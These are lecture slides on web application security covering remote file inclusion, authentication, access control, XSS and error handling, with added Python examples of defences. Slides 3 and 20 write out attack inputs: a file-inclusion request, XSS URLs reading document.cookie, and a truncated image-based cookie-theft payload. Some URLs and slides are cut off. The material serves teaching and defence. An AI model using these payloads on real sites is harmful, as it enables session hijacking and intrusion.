Slide #1: CIT 380: Securing Computer Systems, Web Security
Slide #2: Insecure Remote File Inclusion
Insecure remote file inclusion vulnerabilities allow an attacker to trick the application into executing code provided by the attacker on another site.
Dynamic code
–Includes in PHP, Java, .NET
–DTDs for XML documents
Key Idea
–Attacker controls pathname for inclusion.

Slide #3: PHP Remote Inclusion Flaw
A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script.

<?php
// index.php
include('config.php');
include('include.php');
// Script body
?>

<?php
// config.php
$server_root = '/my/path';
?>

<?php
// include.php
// $server_root is expected to come from config.php, but if include.php is
// requested directly the variable is never set by the application, and a
// value supplied with the request can take its place (the flaw shown below).
include($server_root . '/someotherfile.php');
?>

GET /include.php?server_root=

Slide #4: Mitigating Remote File Inclusion
1. Turn off remote file inclusion.
2. Do not run code from uploaded files.
3. Do not use user-supplied paths.
4. Validate all paths before loading code.
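Items 3 and 4 above can be turned into one small routine: the request never carries a path, only a short name that is looked up in a whitelist, and the resolved path is canonicalised and checked against the include directory before anything is loaded. This is an added example and not code from the slides; the directory name, the module table and the helper name are assumptions.

```python
"""Added example (not from the slides): resolving an include name safely.

The application maps a request-supplied short name to a file it ships
itself, then confirms the canonical path still lies inside the include
directory. INCLUDE_DIR, ALLOWED_INCLUDES and resolve_include are
illustrative names, not part of any real framework.
"""
import os
import re

# Assumed include directory: a fixed application path, never taken from a
# request (slide 4, item 3).
INCLUDE_DIR = "/srv/app/includes"

# Whitelist: the only modules the application is willing to load.
ALLOWED_INCLUDES = {
    "header": "header.php",
    "footer": "footer.php",
    "comments": "libs/COMMENTS.php",
}

# A plain identifier: no "/", "..", ":", NUL bytes or URL schemes.
NAME_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def resolve_include(name, include_dir=INCLUDE_DIR, allowed=ALLOWED_INCLUDES):
    """Return the absolute path to load for a request-supplied module name,
    or None if the request must be rejected."""
    # 1. Syntactic whitelist: reject anything that is not a bare identifier
    #    before it is even looked up.
    if not isinstance(name, str) or not NAME_RE.match(name):
        return None
    # 2. Semantic whitelist: only names the application knows about.
    rel = allowed.get(name)
    if rel is None:
        return None
    # 3. Canonicalise and confirm the result stays under include_dir, so a
    #    mistaken entry in the table cannot escape the directory either
    #    (slide 4, item 4).
    base = os.path.realpath(include_dir)
    full = os.path.realpath(os.path.join(base, rel))
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def is_allowed_include(name):
    """Boolean form of resolve_include for callers that only need a yes/no."""
    return resolve_include(name) is not None
```

The lookup table is the important part: because the client can only name an entry, a remote URL or a traversal sequence never reaches the file system at all, and step 3 is a second line of defence against a bad table entry rather than the primary control.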

Slide #5: Unvalidated Input
Unvalidated input is an architecture flaw.
–Individual input-related bugs are easy to fix.
–How do you defend against the general problem of input-based attacks?
Key Ideas
–Application needs to validate all input.
–Input validation needs to be part of design.

Slide #6: Input Validation Solutions
All input must be validated.
Input must be validated on the server.
Use a standard set of validation rules.
Reject all input that isn’t in your whitelist.
–Blacklists can miss bad inputs.
–Input repairs can produce bad input.
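The following is an added example, not code from the slides, showing what "a standard set of validation rules" applied on the server looks like, and why the two sub-bullets hold: a blacklist misses a trivially varied input, and a "repair" that strips a known-bad token can assemble exactly the token it was removing. The field names, patterns and helper names are assumptions.

```python
"""Added example (not from the slides): one shared table of whitelist rules
applied to every request on the server, beside the blacklist-and-repair
strategy the slide warns against. Field names and patterns are assumed."""
import re

# One rule table for the whole application; each rule must match the
# entire value (fullmatch), so partial matches cannot slip through.
RULES = {
    "username": re.compile(r"[A-Za-z0-9_]{3,20}"),
    "zip":      re.compile(r"[0-9]{5}"),
    "quantity": re.compile(r"[1-9][0-9]{0,2}"),   # 1..999
}


def validate(field, value):
    """Whitelist check: accept only a string that fully matches the rule for
    this field; reject everything else, including unknown fields."""
    rule = RULES.get(field)
    if rule is None or not isinstance(value, str):
        return False
    return rule.fullmatch(value) is not None


def validate_form(form):
    """Validate a whole submission. Returns (ok, offending_fields).
    Missing required fields and unexpected extra fields both fail."""
    bad = [f for f in RULES if not validate(f, form.get(f, ""))]
    extra = [f for f in form if f not in RULES]
    return (not bad and not extra, bad + extra)


def blacklist_repair(value):
    """The approach the slide rejects: remove one known-bad token and pass
    the rest through. Shown only so its failure can be demonstrated."""
    return value.replace("<script>", "")
```

`blacklist_repair("<scr<script>ipt>")` returns `"<script>"`: the repair removed the inner token and joined the halves into the very string it was meant to block, while `validate("username", ...)` simply rejects any such input without trying to understand it.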

Slide #7: Authentication
Authentication is the process of determining a user’s identity.
Key Ideas
–HTTP is a stateless protocol.
–Every request must be authenticated.
–Use username/password on first request.
–Use session IDs on subsequent queries.

Slide #8: Authentication Attacks
Sniffing passwords
Guessing passwords
Identity management attacks
Replay attacks
Session ID fixation
Session ID guessing

Slide #9: Identity Management Attacks
Auth requires identity management
–User registration
–Password changes and resets
Mitigations
–Use CAPTCHAs to protect registration.
–Don’t use easy-to-guess secret questions.
–Don’t allow the attacker to reset the address that the new password is sent to.

Slide #10: Session ID Guessing
Do session IDs show a pattern?
–How does changing the username change the ID?
–How do session IDs change with time?
Brute forcing session IDs
–Use a program to try 1000s of session IDs.
Mitigating guessing attacks
–Use a large key space (128+ bits).
–Use a cryptographically random algorithm.

Slide #11: Mitigating Authentication Attacks
Use SSL to prevent sniffing attacks.
Require strong passwords.
Use secure identity management.
Use a secure session ID mechanism.
–IDs chosen at random from a large space.
–Regenerate session IDs with each request.
–Expire session IDs in a short time.
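The session ID requirements from slides 10 and 11 (128+ bits from a cryptographic source, regeneration on every request, short expiry) fit in one small store. This is an added example, not code from the slides; the timeout value, the store interface and the `FixedClock` helper (there only so expiry can be exercised deterministically) are assumptions.

```python
"""Added example (not from the slides): a session store following slides
10 and 11. IDs are 128 random bits from the OS CSPRNG, a fresh ID is issued
on every authenticated request, and idle sessions expire. The timeout and
class/method names are illustrative choices."""
import secrets
import time

SESSION_ID_BYTES = 16        # 128 bits of entropy (slide 10)
IDLE_TIMEOUT_SECONDS = 900   # expire IDs in a short time (slide 11)


def new_session_id():
    """secrets.token_hex draws from the OS CSPRNG; the ID never depends on
    the username or the clock, so there is no pattern to probe."""
    return secrets.token_hex(SESSION_ID_BYTES)    # 32 hex characters


class FixedClock:
    """Manually advanced clock so expiry can be tested deterministically."""
    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # session_id -> {"user": ..., "last_seen": ...}

    def login(self, user):
        """Called once, after the username/password check succeeds."""
        sid = new_session_id()
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    def authenticate(self, sid):
        """Validate the ID presented on a subsequent request. On success the
        old ID is retired and (user, new_sid) is returned; otherwise None."""
        record = self._sessions.pop(sid, None)   # old ID is spent either way
        if record is None:
            return None
        now = self._clock()
        if now - record["last_seen"] > IDLE_TIMEOUT_SECONDS:
            return None                          # expired: do not reissue
        record["last_seen"] = now
        new_sid = new_session_id()               # regenerate per request
        self._sessions[new_sid] = record
        return record["user"], new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)
```

Rotating on every request means a replayed or sniffed ID is only valid until the legitimate client's next request, and the expiry check runs before the new ID is issued, so a stale ID can never be refreshed into a live one.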

Slide #12: Access Control
Access control determines which users have access to which system resources.
Levels of access control
–Site
–URL
–Function
–Function(parameters)
–Data

Slide #13: Mitigating Broken Access Control
1. Check every access.
2. Use a whitelist model at every layer.
3. Do not rely on client-level access control.
4. Do not rely on security through obscurity.
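As an added example (not code from the slides), the following applies items 1 to 3 at two of the levels from slide 12: a deny-by-default whitelist at the function level and a second check at the function(parameters)/data level, so a user who may call "view order" still cannot view someone else's order. The roles, operations and order records are constructed for illustration.

```python
"""Added example (not from the slides): deny-by-default access control
checked at the function level and again at the data level. Roles, users,
operations and the ORDERS table are constructed sample data."""

# Function-level whitelist: which roles may call which operation.
# Any operation not listed here is denied (slide 13, item 2).
PERMISSIONS = {
    "view_order":   {"customer", "staff"},
    "cancel_order": {"customer", "staff"},
    "refund_order": {"staff"},
}

# Constructed data store: order_id -> owning user.
ORDERS = {101: "alice", 102: "bob"}


class AccessDenied(Exception):
    pass


def check_function_access(user, op):
    """Function level: is this role allowed to call this operation at all?"""
    if user["role"] not in PERMISSIONS.get(op, set()):
        raise AccessDenied(f"{user['name']} may not {op}")


def check_data_access(user, order_id):
    """Data level: does this user own the record named in the parameters?
    Staff may act on any order; customers only on their own."""
    owner = ORDERS.get(order_id)
    if owner is None:
        raise AccessDenied("no such order")
    if user["role"] != "staff" and owner != user["name"]:
        raise AccessDenied(f"{user['name']} does not own order {order_id}")


def perform(user, op, order_id):
    """Every access passes both checks (item 1). The user record comes from
    the server-side session, never from a hidden form field or cookie flag
    the client could edit (item 3)."""
    check_function_access(user, op)
    check_data_access(user, order_id)
    return f"{op} on order {order_id} by {user['name']}"


def is_permitted(user, op, order_id):
    """True/False wrapper around perform for callers that do not want the
    exception."""
    try:
        perform(user, op, order_id)
        return True
    except AccessDenied:
        return False
```

Note that an unknown operation such as `"delete_order"` is refused even though nothing mentions it anywhere: that is the whitelist model, and it is what keeps a forgotten URL or function from being reachable by accident (item 4).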

Slide #14: Cross-Site Scripting (XSS)
Attacker causes a legitimate web server to send user-executable content (Javascript, Flash ActionScript) of the attacker’s choosing.
XSS used to obtain session ID for
–Bank site (transfer money to attacker)
–Shopping site (buy goods for attacker)
Key ideas
–Attacker sends malicious code to server.
–Victim’s browser loads code from server and runs it.

Slide #15: XSS Attacks
MySpace worm (October 2005)
–When someone viewed Samy’s profile:
  Set him as friend of viewer.
  Incorporated code in viewer’s profile.
Paypal (2006)
–XSS redirect used to steal money from Paypal users in a phishing scam.
BBC, CBS (2006)
–By following an XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year-old as head of the Information Security department.

Slide #16: Stored XSS
–Injected script stored in comment, message, etc.
–Requires ability to insert malicious code into web documents (comments, reviews, etc.)
–Persistent until message deleted.

Slide #17: Reflected XSS
–Injected script returned by one-time message.
–Requires tricking user to click on link.
–Non-persistent. Only works when user clicks.

Slide #18: Why does XSS Work?
Same-Origin Policy
–Browser only allows Javascript from site X to access cookies and other data from site X.
–Attacker needs to make attack come from site X.
Vulnerable Server Program
–Any program that returns user input without filtering out dangerous code.

Slide #19: Anatomy of an XSS Attack
(Diagram with three parties: User, Web Server, Attacker.)
1. Login
2. Cookie
3. XSS Attack
4. User clicks on XSS link.
5. XSS URL
6. Page with injected code.
7. Browser runs injected code. Evil site saves ID.
8. Attacker hijacks user session.

Slide #20: XSS URL Examples
="> alert(document.cookie)
page2.html?tw= alert(‘Test’); alert(document.cookie) &frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
rch_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

(March 15, 2008, SIGCSE) Exploiting the Vulnerability
1. User logs in and is issued a cookie.
2. Attacker feeds the URL to the user:
var+i=new+Image;+i.src=“

Slide #23: Mitigating XSS
1. Disallow HTML input
2. Allow only safe HTML tags
3. Filter output
 Replace HTML special characters in output, e.g. replace < and > with &lt; and &gt;; also replace (, ), #, &
4. Tagged cookies
 Include IP address in cookie and only allow access from the original IP address that the cookie was created for.
5. Client: disable Javascript
 Use NoScript extension for Firefox.
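Item 3, escaping on output, is the mitigation that works regardless of how the data got in (stored or reflected), so here it is as an added example rather than code from the slides. The function maps each HTML special character to its entity form and is applied to every untrusted value at the moment it is written into the page; the comment-rendering helper, the sample inputs and the helper names are constructed for illustration.

```python
"""Added example (not from the slides): escaping HTML special characters
on output (slide 23, item 3). render_comment and contains_live_tag are
illustrative helpers; the inputs used with them are constructed."""

# Characters that change meaning inside HTML and their entity forms. The
# ampersand is included so that untrusted text cannot forge entities.
HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def escape_html(text):
    """Replace every special character so the browser shows it as text
    instead of parsing it as markup. Characters are handled one at a time,
    so the order of the table does not matter."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in str(text))


def render_comment(author, body):
    """Build the fragment a server would emit for a stored comment. Both
    untrusted values are escaped at the point of output: the author lands in
    a quoted attribute, the body in element content."""
    return (f'<div class="comment" data-author="{escape_html(author)}">'
            f"{escape_html(body)}</div>")


def contains_live_tag(html):
    """Check used on the result: True if an unescaped <script tag survived,
    i.e. the browser would still treat part of the output as code."""
    return "<script" in html.lower()
```

Escaping the quote characters matters as much as the angle brackets: a value inserted into an attribute, as `author` is above, can break out of the attribute with a single `"` even if it contains no `<` at all. Item 1 (rejecting HTML on input) and item 3 are complementary, not alternatives; output escaping is what still protects the page when data arrives by a path the input filter never saw.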

Slide #24: Improper Error Handling
Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly.
Errors can provide too much data
–Stack traces
–SQL statements
–Subsystem errors
–User typos, such as passwords.

Slide #25: Example of Improper Error Handling
mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145)
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 124

Slide #26: Mitigating Improper Error Handling
1. Catch all exceptions.
2. Check all error codes.
3. Wrap application with catch-all handler.
4. Send user-friendly message to user.
5. Store details for debugging in log files.
6. Don’t log passwords or other sensitive data.
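Items 1, 3, 4, 5 and 6 together describe one wrapper around the application, shown here as an added example (not code from the slides). The wrapper catches everything, writes the traceback and a redacted copy of the request to the log under a reference id, and returns only a generic message carrying that id to the user, so the query text and file path from slide 25 never reach the browser. The request shape, the sensitive field names and the failing handler are constructed for illustration.

```python
"""Added example (not from the slides): a catch-all request wrapper
following slide 26. Request parameters are a dict, SENSITIVE_FIELDS and
login_handler are constructed, and the `log` list parameter exists so the
log output can be inspected without a logging configuration."""
import logging
import traceback
import uuid

logger = logging.getLogger("app")

# Fields whose values must never be written to a log (item 6).
SENSITIVE_FIELDS = {"password", "new_password", "credit_card"}


def redact(params):
    """Copy of the request parameters with sensitive values masked."""
    return {k: ("[REDACTED]" if k in SENSITIVE_FIELDS else v)
            for k, v in params.items()}


def handle_request(handler, params, log=None):
    """Run an application handler under a catch-all (items 1 and 3).
    Returns (status, body). If `log` is a list, details are appended to it
    instead of going to the logging module, so callers can inspect them."""
    try:
        return 200, handler(params)
    except Exception:
        ref = uuid.uuid4().hex[:12]          # ties the user message to the log entry
        details = "error ref=%s params=%r\n%s" % (
            ref, redact(params), traceback.format_exc())
        if log is not None:
            log.append(details)              # item 5: full details for debugging
        else:
            logger.error(details)
        # item 4: friendly message, no internals, just the reference id
        return 500, f"Something went wrong. Please quote reference {ref}."


def login_handler(params):
    """Constructed handler that fails the way the slide 25 database call did."""
    raise RuntimeError("Can't open file: 'nucleus_comment.MYI' (errno: 145)")


def echo_handler(params):
    """Constructed handler that succeeds, to show the normal path."""
    return "ok"
```

The reference id is the compromise between items 4 and 5: support staff can find the full traceback by searching the log for it, while the user-visible text says nothing about which subsystem failed or where the code lives.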